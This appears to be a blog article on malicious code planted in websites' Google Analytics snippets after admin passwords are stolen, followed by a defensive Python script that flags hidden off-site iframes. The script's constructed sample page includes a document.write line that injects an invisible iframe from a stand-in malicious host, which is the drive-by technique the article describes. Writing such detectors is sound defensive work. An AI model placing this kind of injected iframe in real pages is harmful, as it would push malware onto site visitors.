How heart-wrenching is it to find out, after adding Google Analytics to your website, that the added code contains malicious code designed to download viruses onto your visitors' computers? Not very pleasing! Well, that is exactly what is happening to many website owners who have added the Google Analytics code to their websites.

One website owner said that on March 16th, three of his website members reported that his UK-based website was attempting to download a virus to their computers. The webmaster and his team then deployed a barrage of investigative measures, which revealed that it was indeed a piece of malicious code hidden within the Google Analytics tracking code that was attempting to download the virus to people's computers, according to the Google Support Forum.

A Google support staff member was quick to point out that he has in fact seen a multitude of websites being compromised in a similar manner, and that the actual reason for the problem is compromised passwords. Whenever the admin password for accessing a website ends up in the hands of the wrong people, bad things happen.

These malicious program producers gain access to an unsuspecting website by using a compromised password and then plant virus-producing code within the Google Analytics JavaScript code block. Therefore, people should not get the wrong impression and start blaming the Google Analytics code for being malicious. It is the code added by the perpetrators that is malicious, not the Google code itself. In effect, it is the Google Analytics code that is compromised by the hackers; I just wanted to make that clear.

Therefore, to prevent such a thing from happening on any website, the webmaster of that site should take extra precautions by periodically changing passwords. While a compromised password is one way of exploiting the Google Analytics code, the Google support staff cautioned us that it is not the only method of exploiting the code while it is on a website.

Another method of exploitation is the actual injecting of malicious scripts by websites indulging in such practices. An example of such a website was discussed by the Google support staff in the support forum. The support staff gave actual names of programs and websites suspected of delivering viruses to compromised websites.

Scripts distributed by malicious websites deliver code that creates hidden iframes, which are loaded directly from those malicious sites. It is through this mechanism that viruses are downloaded to people's computers.

One victim of the Google Analytics exploit came forward and shared his story, saying that his case was characterized by several days of excessive traffic from an unusual spider that scanned every page on his website.

He then immediately removed the Google Analytics code from his website and server, which ceased the unusual spider activity. This webmaster's website was ASP-based. This tells us that it does not make any difference what framework the target website is built on; the danger still exists for malicious websites to use Google Analytics as a virus delivery tool! So, this can happen to websites running ASP, PHP, HTML, etc.

In the event of a Google Analytics exploit, webmasters should check their server access logs for any kind of suspicious GET (and POST) requests. These requests will most likely be made by the suspected malicious program, because computer viruses can be injected into websites via HTTP requests, according to a Google support forum member.

The rule of thumb for website owners is to always take extra precautions in password security by changing passwords frequently. A name, date of birth, or child's birth date should never be used as a password. In fact, passwords should combine letters, numbers, and special characters to make them very difficult to figure out.

We saw in our discussions that it is not the Google Analytics code that is totally to blame for the downloading of viruses to people's computers. It is the password security of websites.
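The hidden iframes described above can be looked for in a site's own pages. The following is an added example, not code from the original article or from Google: it flags iframes that are invisible and load from another host, both in markup and as literal tags written out from inside a script block. `audit_page`, the host names and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
IFRAME_IN_JS = re.compile(r"<iframe\b[^>]*>", re.I)  # literal tag inside script text

class IframeAudit(HTMLParser):
    """Collect hidden iframes whose src points at a host other than our own."""
    def __init__(self, site_host, where="markup"):
        super().__init__()
        self.site_host, self.where = site_host, where
        self.in_script, self.findings = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        if tag != "iframe":
            return
        a = dict(attrs)
        host = urlparse(a.get("src") or "").hostname
        if a.get("width") in ("0", "1") or a.get("height") in ("0", "1"):
            reason = "zero/one-pixel size"
        elif HIDDEN_STYLE.search(a.get("style") or ""):
            reason = "hidden by style"
        else:
            return  # visible frame, nothing to report
        if host and host != self.site_host:
            self.findings.append((host, reason, self.where))
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        # Inside a script block, re-parse any literal <iframe ...> it writes out.
        for tag in IFRAME_IN_JS.findall(data) if self.in_script else []:
            inner = IframeAudit(self.site_host, "script")
            inner.feed(tag)
            self.findings += inner.findings

def audit_page(html, site_host):
    parser = IframeAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: one benign frame, one hidden frame, one written from the tracking block.
SAMPLE = """<iframe src="/news.html" width="300" height="200"></iframe>
<iframe src="http://malicious.example/x" style="visibility: hidden"></iframe>
<script>pageTracker._trackPageview();
document.write('<iframe src="http://malicious.example/in.php" width="0" height="0"></iframe>');
</script>"""
```

The check only sees literal iframe tags, so an encoded or obfuscated addition still needs the tracking block compared against the snippet as Google supplied it.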